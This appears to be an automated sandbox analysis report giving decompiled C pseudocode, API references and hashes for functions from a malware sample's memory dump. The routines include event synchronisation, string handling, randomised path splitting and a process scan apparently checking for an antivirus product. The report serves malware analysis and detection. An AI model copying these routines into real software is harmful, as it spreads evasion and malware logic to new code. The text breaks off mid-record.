APIs

SysAllocString.OLEAUT32(80000002), ref: 013734A3
SysAllocString.OLEAUT32(013720DE), ref: 013734E6
SysFreeString.OLEAUT32(00000000), ref: 013734FA
SysFreeString.OLEAUT32(00000000), ref: 01373508

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 2fd8244890d8d19bd52e183c8946741704c6d9caeb2fb7ab62b74c2407620d20
Instruction ID: f7dc0fab33c301dc8e5fc3933a2b2055767e99977050d416a19006c59eb3f53a
Opcode Fuzzy Hash: 2fd8244890d8d19bd52e183c8946741704c6d9caeb2fb7ab62b74c2407620d20
Instruction Fuzzy Hash: D4310D71900109EFCB25DF98D4C48EE7BB9FF48354B14842EE506A7210E7359A45DF61

Uniqueness

Uniqueness Score: -1.00%

Function 01374CD5, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E01374CD5(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x137a2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x137a2d0; // 0x666d5a8
				_t3 = _t8 + 0x137b84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E01371970(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x137a2d4, 1, 0, _t30);
					E01372A03(_t30);
				}
				_t12 =  *0x137a2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E013719E7() == 0) {
						_t28 =  *0x137a124( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E013763CD(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E01377836(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x01374cd6
0x01374cdd
0x01374ce7
0x01374ceb
0x01374cf1
0x01374cfe
0x01374d05
0x01374d09
0x01374d1b
0x01374d1d
0x01374d1d
0x01374d22
0x01374d29
0x01374d34
0x01374d4a
0x01374d4e
0x01374d50
0x01374d55
0x01374d55
0x01374d62
0x01374d66
0x01374d6a
0x00000000
0x00000000
0x01374d78
0x01374d7c
0x00000000
0x00000000
0x01374d7c
0x01374d66
0x00000000
0x01374d7e
0x01374d7e
0x01374d7e
0x01374d84
0x01374d86
0x01374d86
0x01374d90
0x01374d94
0x01374da6
0x01374da6
0x01374daa
0x01374db0
0x01374db0
0x01374db3
0x01374db5
0x01374db8
0x01374db8
0x01374dbf
0x01374dc5
0x01374dc5

APIs

Part of subcall function 01371970: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,7691C740,01373EC5,74666F53,00000000,?,00000000,?,?,01372F4F), ref: 013719A6
Part of subcall function 01371970: lstrcpy.KERNEL32(00000000,00000000), ref: 013719CA
Part of subcall function 01371970: lstrcat.KERNEL32(00000000,00000000), ref: 013719D2

CreateEventA.KERNEL32(0137A2D4,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,01377338,?,?,?), ref: 01374D14

Part of subcall function 01372A03: HeapFree.KERNEL32(00000000,00000000,01374072,00000000,?,?,00000000,?,?,?,?,?,?,013744AE,00000000), ref: 01372A0F

WaitForSingleObject.KERNEL32(00000000,00004E20,01377338,00000000,?,00000000,?,01377338,?,?,?,?,?,?,?,01371C40), ref: 01374D72
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,01377338,?,?,?), ref: 01374DA0
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,01377338,?,?,?), ref: 01374DB8

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 23ebe5bf7789538a6ebbb8aae95269821e6590cbe7e7ff95a6dfac2a7636a478
Instruction ID: 4bb9a822413e4fbc479636cebaa0c06a9d8de3f4d09339feb16377a721c17e1e
Opcode Fuzzy Hash: 23ebe5bf7789538a6ebbb8aae95269821e6590cbe7e7ff95a6dfac2a7636a478
Instruction Fuzzy Hash: 7921C9326007265BE7325BAC9D44B5B77DDBF48759F090229FE8197246EB78EC00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01377289, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E01377289(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E01372616(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E013728B8(_t23);
						}
					}
					return _t38;
				}
				if(E01374380(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x137a2d4, 1, 0,  *0x137a394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E01377360(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E0137202E(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E01373EFA(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E01374CD5( &_v32, _t39);
					goto L13;
				}
			}

0x01377289
0x01377296
0x0137729c
0x0137729d
0x0137729e
0x0137729f
0x013772a0
0x013772a4
0x013772b0
0x013772b4
0x0137733c
0x0137733c
0x0137733f
0x01377341
0x01377349
0x0137734f
0x01377352
0x01377352
0x0137734f
0x0137735d
0x0137735d
0x013772c7
0x013772c9
0x013772c9
0x013772e0
0x013772e4
0x013772e7
0x013772f2
0x013772f9
0x013772f9
0x01377305
0x01377306
0x01377314
0x01377308
0x01377308
0x01377309
0x0137730a
0x0137730b
0x0137730c
0x0137730d
0x0137730d
0x01377319
0x0137731e
0x01377320
0x01377322
0x01377322
0x01377329
0x00000000
0x0137732b
0x0137732b
0x01377338
0x00000000
0x01377338

APIs

CreateEventA.KERNEL32(0137A2D4,00000001,00000000,00000040,?,?,74E5F710,00000000,74E5F730,?,?,?,?,01371C40,?,00000001), ref: 013772DA
SetEvent.KERNEL32(00000000,?,?,?,?,01371C40,?,00000001,01372F7D,00000002,?,?,01372F7D), ref: 013772E7
Sleep.KERNEL32(00000BB8,?,?,?,?,01371C40,?,00000001,01372F7D,00000002,?,?,01372F7D), ref: 013772F2
CloseHandle.KERNEL32(00000000,?,?,?,?,01371C40,?,00000001,01372F7D,00000002,?,?,01372F7D), ref: 013772F9

Part of subcall function 01377360: WaitForSingleObject.KERNEL32(00000000,?,?,?,01377319,?,01377319,?,?,?,?,?,01377319,?), ref: 0137743A
Part of subcall function 01377360: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,01377319,?,?,?,?,?,01371C40,?), ref: 01377462

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEvent$CreateHandleObjectSingleSleepWait
String ID:
API String ID: 467273019-0
Opcode ID: bfa17645a2bd16e5f81456897c64d0cc2ed34d92e873b2e41353a74d4ffb4cf9
Instruction ID: 8365f6dba4abd6c9a4906d3986e2a1db02861a532b43971950747e2c5fc87a49
Opcode Fuzzy Hash: bfa17645a2bd16e5f81456897c64d0cc2ed34d92e873b2e41353a74d4ffb4cf9
Instruction Fuzzy Hash: E1218773D0021AABEF31AFEC88899EE77BDAB04258F454529EA15E7140D778D9418BE0

Uniqueness

Uniqueness Score: -1.00%

Function 01375988, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E01375988(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E01375C4E(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x01375994
0x01375998
0x01375999
0x0137599a
0x0137599c
0x0137599e
0x013759a3
0x013759a6
0x01375a3d
0x01375a44
0x01375a44
0x013759af
0x013759b6
0x013759c6
0x013759c6
0x013759cc
0x013759ce
0x013759d3
0x013759dc
0x013759e4
0x013759e7
0x013759f2
0x013759f6
0x013759f8
0x013759f9
0x01375a02
0x01375a06
0x01375a17
0x01375a08
0x01375a0d
0x01375a12
0x01375a21
0x01375a21
0x013759f6
0x01375a27
0x01375a2d
0x01375a2d
0x01375a36
0x01375a3b
0x01375a3b
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 013759B6
lstrlenW.KERNEL32(?), ref: 013759EC
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 01375A0D
SysFreeString.OLEAUT32(?), ref: 01375A21

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 73f1452a9bded45bfccf25bfe286ac3c0f772d6603ced3f3927f2ee395f08c0e
Instruction ID: 97eb0847dded745bd60c93edbfb020971aed5a9c7a573c36e40e654e35f30e37
Opcode Fuzzy Hash: 73f1452a9bded45bfccf25bfe286ac3c0f772d6603ced3f3927f2ee395f08c0e
Instruction Fuzzy Hash: CE21307590020AEFDB65EFA8C884A9EBBB8FF49319F104169E945E7204E7349A05CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01374138, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E01374138(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x137a290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x137a2a8; // 0x0
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x137a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x01374140
0x01374143
0x01374149
0x01374161
0x01374165
0x01374168
0x0137416a
0x0137416d
0x0137416f
0x01374172
0x01374174
0x01374174
0x01374176
0x01374181
0x01374186
0x01374197
0x0137419f
0x013741a4
0x013741a7
0x013741aa
0x013741ac
0x013741b2
0x013741b5
0x013741b5
0x013741b5
0x013741c0
0x013741c5
0x013741cf

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01375B76,00000000,?,00000000,01376301,00000000,079E9630), ref: 01374143
RtlAllocateHeap.NTDLL(00000000,?), ref: 0137415B
memcpy.NTDLL(00000000,079E9630,-00000008,?,?,?,01375B76,00000000,?,00000000,01376301,00000000,079E9630), ref: 0137419F
memcpy.NTDLL(00000001,079E9630,00000001,01376301,00000000,079E9630), ref: 013741C0

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 8a6b715def4dc2e87ad63d04088be7be4cc70de11e2d014e99baaa0749a22321
Instruction ID: 9874c9069bbe3c01e1ad031d8970f364bffa77efbf418406bb337cb417778ee1
Opcode Fuzzy Hash: 8a6b715def4dc2e87ad63d04088be7be4cc70de11e2d014e99baaa0749a22321
Instruction Fuzzy Hash: 72110672A00115AFC731CB69EC84E9EBBAEDB95360F050266E804D7150EA749E048760

Uniqueness

Uniqueness Score: -1.00%

Function 013749BA, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E013749BA(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E01375C4E(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x13792c4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x13792c4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x013749c5
0x013749c9
0x013749cb
0x013749cc
0x013749d4
0x013749d4
0x013749d8
0x00000000
0x00000000
0x013749cf
0x013749d0
0x013749d3
0x013749d3
0x013749e0
0x013749e7
0x013749eb
0x013749f3
0x013749f9
0x013749fb
0x01374a00
0x01374a04
0x01374a06
0x01374a09
0x01374a10
0x01374a10
0x01374a1a
0x01374a1d
0x01374a20
0x01374a20
0x01374a2c
0x01374a2c
0x01374a39

APIs

StrChrA.SHLWAPI(?,00000020,00000000,079E962C,?,?,?,01376072,079E962C,?,?,01372F44), ref: 013749D4
StrTrimA.SHLWAPI(?,013792C4,00000002,?,?,?,01376072,079E962C,?,?,01372F44), ref: 013749F3
StrChrA.SHLWAPI(?,00000020,?,?,?,01376072,079E962C,?,?,01372F44,?,?,?,?,?,013744F9), ref: 013749FE
StrTrimA.SHLWAPI(00000001,013792C4,?,?,?,01376072,079E962C,?,?,01372F44,?,?,?,?,?,013744F9), ref: 01374A10

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: f8359807b76187e92046be4913741dbecf6f4ed67373dde473a82bac7ab15ea8
Instruction ID: 3fd9e2d24c041555780c948e9468c3fa63f506cefb3deb50e3200d40bdc2d2d1
Opcode Fuzzy Hash: f8359807b76187e92046be4913741dbecf6f4ed67373dde473a82bac7ab15ea8
Instruction Fuzzy Hash: 0001D8716053256FE3319E69DC49F2BBFDCEB4AAA8F110619F981D7240EB68D80187A4

Uniqueness

Uniqueness Score: -1.00%

Function 01371970, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E01371970(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E0137354E(_t8, _t1);
				_t16 = E01375C4E(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E0137756E(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E01375C4E(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E01372A03(_t16);
				}
				return _t18;
			}

0x0137197b
0x0137197c
0x0137197f
0x01371981
0x0137198c
0x01371990
0x01371995
0x01371999
0x013719a1
0x013719a6
0x013719ae
0x013719ae
0x013719b7
0x013719bb
0x013719c1
0x013719c4
0x013719ca
0x013719ca
0x013719d2
0x013719d2
0x013719d9
0x013719d9
0x013719e4

APIs

Part of subcall function 01375C4E: RtlAllocateHeap.NTDLL(00000000,00000000,01373FAA), ref: 01375C5A

Part of subcall function 0137756E: wsprintfA.USER32 ref: 013775CA

lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,7691C740,01373EC5,74666F53,00000000,?,00000000,?,?,01372F4F), ref: 013719A6
lstrcpy.KERNEL32(00000000,00000000), ref: 013719CA
lstrcat.KERNEL32(00000000,00000000), ref: 013719D2

Strings

Soft, xrefs: 0137197C, 01371995

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: 64310ec02761fbfe97661587c440a524890f2eca52048414060bfa4859c93ca3
Instruction ID: 4a0c8a4a0b57d71ec59141fd299db74e715e09b6e12e9c33d008fe3e324ad7fd
Opcode Fuzzy Hash: 64310ec02761fbfe97661587c440a524890f2eca52048414060bfa4859c93ca3
Instruction Fuzzy Hash: BF01AD3210020AA7DB323B6D9C88BEF3E6DAF95269F044125FA05A5104DB7C8546C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 013719E7, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E013719E7() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x137a2d0; // 0x666d5a8
						_t2 = _t9 + 0x137be04; // 0x73617661
						_push( &_v264);
						if( *0x137a11c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x013719f2
0x013719fc
0x01371a00
0x01371a0a
0x01371a3b
0x01371a11
0x01371a16
0x01371a23
0x01371a2c
0x01371a43
0x01371a2e
0x01371a36
0x00000000
0x01371a36
0x01371a44
0x01371a45
0x00000000
0x01371a45
0x00000000
0x01371a3f
0x01371a4b
0x01371a50

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 013719F7
Process32First.KERNEL32(00000000,?), ref: 01371A0A
Process32Next.KERNEL32(00000000,?), ref: 01371A36
CloseHandle.KERNEL32(00000000), ref: 01371A45

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: ea58c11a5b1c1a3c6cf3027ae340a4f7bfcd27ecfb65fce33990428aff94d113
Instruction ID: 6dad9b3e922b32de8fcb03ab221db06f7103cb49fece264ba0cb29a89a24273c
Opcode Fuzzy Hash: ea58c11a5b1c1a3c6cf3027ae340a4f7bfcd27ecfb65fce33990428aff94d113
Instruction Fuzzy Hash: E2F090725001286AF771B66A9C49EEB76FCEB85318F000061E90AD3104EA389A46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01371547, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01371547() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x137a2c4; // 0x328
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x137a304; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x137a2c4; // 0x328
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x137a290; // 0x75f0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x01371547
0x0137154e
0x01371598
0x0137159a
0x0137159a
0x01371552
0x01371558
0x0137155d
0x01371561
0x01371567
0x0137156e
0x00000000
0x00000000
0x01371570
0x01371575
0x00000000
0x00000000
0x00000000
0x01371575
0x01371577
0x0137157f
0x01371582
0x01371582
0x01371588
0x0137158f
0x01371592
0x01371592
0x00000000

APIs

SetEvent.KERNEL32(00000328,00000001,01374214), ref: 01371552
SleepEx.KERNEL32(00000064,00000001), ref: 01371561
CloseHandle.KERNEL32(00000328), ref: 01371582
HeapDestroy.KERNEL32(075F0000), ref: 01371592

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: ffff35939945b7292c5fbcb6af791e95abb03b20a2c39db41c3ce21338b352c7
Instruction ID: 8cfc7c8f0e9a065e2bf7c20142a99c65941b951e3be68e4677086a95f3eee124
Opcode Fuzzy Hash: ffff35939945b7292c5fbcb6af791e95abb03b20a2c39db41c3ce21338b352c7
Instruction Fuzzy Hash: F2F03072B50311DBE7355A38A90DB1E3BEDAB15739F0C0614F91AD3188DA29C500C750

Uniqueness

Uniqueness Score: -1.00%

Function 01375EC8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E01375EC8(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t21;
				void* _t23;
				void* _t24;
				signed short* _t25;

				_t23 = __edx;
				_t24 = E013733FA(0, _a12);
				if(_t24 == 0) {
					_t21 = 8;
				} else {
					_t25 = _t24 + _a16 * 2;
					 *_t25 =  *_t25 & 0x00000000;
					_t21 = E01371A6B(__ecx, _a4, _a8, _t24);
					if(_t21 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_push( &_v12);
						 *_t25 = 0x5f;
						_t21 = E01375C15(_t23, 8, _a4, 0x80000001, _a8, _t24);
					}
					HeapFree( *0x137a290, 0, _t24);
				}
				return _t21;
			}

0x01375ec8
0x01375edb
0x01375edf
0x01375f39
0x01375ee1
0x01375ee8
0x01375eee
0x01375ef7
0x01375efb
0x01375f01
0x01375f0a
0x01375f0f
0x01375f24
0x01375f24
0x01375f2f
0x01375f2f
0x01375f40

APIs

Part of subcall function 013733FA: lstrlen.KERNEL32(?,0137A380,74E47FC0,00000000,01372788,?,?,?,?,?,01373EAC,?), ref: 01373403
Part of subcall function 013733FA: mbstowcs.NTDLL ref: 0137342A
Part of subcall function 013733FA: memset.NTDLL ref: 0137343C

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,74E05520,00000000,00000008,00000014,004F0053,079E932C), ref: 01375F01
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,74E05520,00000000,00000008,00000014,004F0053,079E932C), ref: 01375F2F

Strings

Ut, xrefs: 01375F2F

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID: Ut
API String ID: 1500278894-8415677
Opcode ID: 9d45025ce167f723db810f8cc23b9c466766c7643ddadc86585ea045713a2fc0
Instruction ID: e3196103e9c06eecd4f539fdadb9c6f57bb6a320d4fc9c3e33eed1c7eb5144c7
